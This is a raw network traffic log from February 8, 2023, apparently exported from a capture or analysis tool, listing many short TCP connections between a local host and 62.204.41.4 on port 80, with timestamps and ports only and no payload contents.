                            Feb 8, 2023 17:38:39.652271032 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.755845070 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.756716967 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.816061020 CET804995462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.816304922 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.817318916 CET804995362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.817445040 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.826366901 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.885719061 CET804995462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.895251036 CET804995462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.895688057 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.007152081 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.008330107 CET4995580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.066735029 CET804995462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:40.066967964 CET4995480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.069731951 CET804995562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:40.069958925 CET4995580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.070472002 CET4995580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.131814957 CET804995562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:40.136811018 CET804995562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:40.137269020 CET4995580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:40.244457960 CET4995580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.024344921 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.084562063 CET804999462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.084690094 CET4999480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.086862087 CET804999562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.086997986 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.087421894 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.149871111 CET804999562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.153852940 CET804999562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.153995037 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.257443905 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.258459091 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.319971085 CET804999662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.320177078 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.320588112 CET804999562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.320688963 CET4999580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.320993900 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.383718967 CET804999662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.386444092 CET804999662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.386595964 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.492460012 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.497476101 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.553330898 CET804999662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.553512096 CET4999680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.559168100 CET804999762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.559359074 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.560102940 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.621797085 CET804999762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.624541044 CET804999762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.624794006 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.746982098 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.747684956 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.808475971 CET804999862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.808728933 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.808892012 CET804999762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.808989048 CET4999780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.809592009 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.869805098 CET804999862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.872339010 CET804999862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:55.872442961 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.975801945 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:55.977466106 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.036206961 CET804999862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.036387920 CET4999880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.037725925 CET804999962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.037905931 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.038686037 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.102726936 CET804999962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.108273983 CET804999962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.108436108 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.213639021 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.214287996 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.274238110 CET804999962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.274365902 CET4999980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.275728941 CET805000062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.275854111 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.276222944 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.337665081 CET805000062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.340622902 CET805000062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.340692043 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.445480108 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.446319103 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.507164955 CET805000062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.507253885 CET5000080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.507589102 CET805000162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.507673979 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.508013964 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.570751905 CET805000162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.572273970 CET805000162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.572357893 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.680608988 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.681622982 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.743243933 CET805000262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.743345022 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.743695974 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.743855953 CET805000162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.744004011 CET5000180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.803117990 CET805000262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.807535887 CET805000262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.807676077 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.914747953 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.915889025 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.974525928 CET805000262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.974684954 CET5000280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.977684021 CET805000362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:56.977885008 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:56.978357077 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.042849064 CET805000362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.047149897 CET805000362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.047452927 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.165244102 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.165842056 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.227252007 CET805000362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.228113890 CET805000462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.228240013 CET5000380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.228353977 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.228666067 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.291032076 CET805000462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.293574095 CET805000462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.295440912 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.397583961 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.398242950 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.461930990 CET805000462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.462925911 CET805000562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.463105917 CET5000480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.463366985 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.463505983 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.529221058 CET805000562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.532308102 CET805000562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.534456015 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.648030043 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.649173021 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.710741043 CET805000562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.710803032 CET805000662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.711020947 CET5000580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.711030960 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.717411041 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.778919935 CET805000662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.781058073 CET805000662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.781316042 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.898221970 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.899063110 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.959664106 CET805000762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.959717035 CET805000662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:57.959849119 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.959894896 CET5000680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:57.964843035 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.025608063 CET805000762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.028038979 CET805000762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.028182030 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.136729956 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.137478113 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.197483063 CET805000762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.197726011 CET5000780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.198235035 CET805000862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.198447943 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.198992014 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.262165070 CET805000862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.265856981 CET805000862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.266001940 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.382508039 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.383277893 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.443264008 CET805000862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.443475962 CET5000880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.445795059 CET805000962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.445977926 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.446402073 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.509090900 CET805000962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.511236906 CET805000962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.511323929 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.617547989 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.619239092 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.680461884 CET805000962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.680753946 CET5000980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.680990934 CET805001062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.681114912 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.684720993 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.746650934 CET805001062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.748893023 CET805001062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.749196053 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.852190018 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.853941917 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.914119005 CET805001062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.914212942 CET5001080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.916975975 CET805001162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.917141914 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.917493105 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:58.981909037 CET805001162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.984626055 CET805001162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:58.984930992 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.118040085 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.118724108 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.181134939 CET805001162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.181292057 CET5001180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.181664944 CET805001262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.181771994 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.182172060 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.245146990 CET805001262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.249001980 CET805001262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.249154091 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.351181030 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.351799011 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.416385889 CET805001362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.416460037 CET805001262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.416487932 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.416515112 CET5001280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.416856050 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.481359959 CET805001362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.484484911 CET805001362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.484606981 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.602220058 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.603657961 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.663984060 CET805001362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.664063931 CET5001380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.665596008 CET805001462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.665745020 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.675888062 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.737601042 CET805001462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.741914988 CET805001462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.742039919 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.851713896 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.852380037 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.915743113 CET805001462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.915859938 CET5001480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.919069052 CET805001562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.919168949 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.919528961 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:59.983777046 CET805001562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.986246109 CET805001562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:59.986401081 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.101260900 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.102278948 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.163769960 CET805001662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.163830042 CET805001562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.163964987 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.164048910 CET5001580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.164304972 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.225620031 CET805001662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.230684042 CET805001662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.230848074 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.335954905 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.336826086 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.397511959 CET805001662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.399305105 CET805001762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.399378061 CET5001680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.401962042 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.402673006 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.465240002 CET805001762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.467941046 CET805001762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.468210936 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.570239067 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.571185112 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.633028984 CET805001862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.633110046 CET805001762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.633284092 CET5001780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.633702993 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.633702993 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.695415974 CET805001862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.697846889 CET805001862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.699767113 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.807097912 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.807930946 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.868982077 CET805001862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.869049072 CET5001880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.869297028 CET805001962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.869379997 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.869716883 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:00.935734034 CET805001962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.937946081 CET805001962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:00.938051939 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.054961920 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.056298018 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.118407965 CET805001962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.118592024 CET5001980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.118860006 CET805002062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.119108915 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.119659901 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.181741953 CET805002062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.187212944 CET805002062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.187377930 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.304357052 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.305455923 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.368710041 CET805002062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.369157076 CET5002080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.369703054 CET805002162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.369851112 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.371725082 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.437511921 CET805002162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.439729929 CET805002162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.439971924 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.554533005 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.555386066 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.615880966 CET805002262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.615994930 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.616112947 CET805002162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.616178989 CET5002180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.616779089 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.677217960 CET805002262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.680536985 CET805002262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.680702925 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.789957047 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.790863991 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.853471041 CET805002262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.853636980 CET5002280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.854681015 CET805002362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.854821920 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.855210066 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:01.918992043 CET805002362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.922120094 CET805002362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:01.922240973 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.039017916 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.040040016 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.099731922 CET805002462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.099884987 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.100310087 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.100466967 CET805002362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.100548029 CET5002380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.159831047 CET805002462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.164222002 CET805002462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.164357901 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.273725033 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.275486946 CET5002580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.333585978 CET805002462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:02.333689928 CET5002480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:02.337033987 CET805002562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.871051073 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.871504068 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:11.933904886 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.936068058 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:11.936132908 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.048929930 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.049812078 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.111654043 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.111692905 CET805006462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.111884117 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.111920118 CET5006480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.112270117 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.174149036 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.177773952 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.177875042 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.290231943 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.291878939 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.351392984 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.351476908 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.351866007 CET805006562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.351962090 CET5006580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.352601051 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.411828041 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.414014101 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.414186001 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.525558949 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.526964903 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.585059881 CET805006662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.585184097 CET5006680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.587275028 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.587394953 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.587873936 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.648269892 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.650434971 CET805006762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.650516033 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.759605885 CET5006780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.760746956 CET5006880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:12.823084116 CET805006862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:12.823276043 CET5006880192.168.2.462.204.41.4
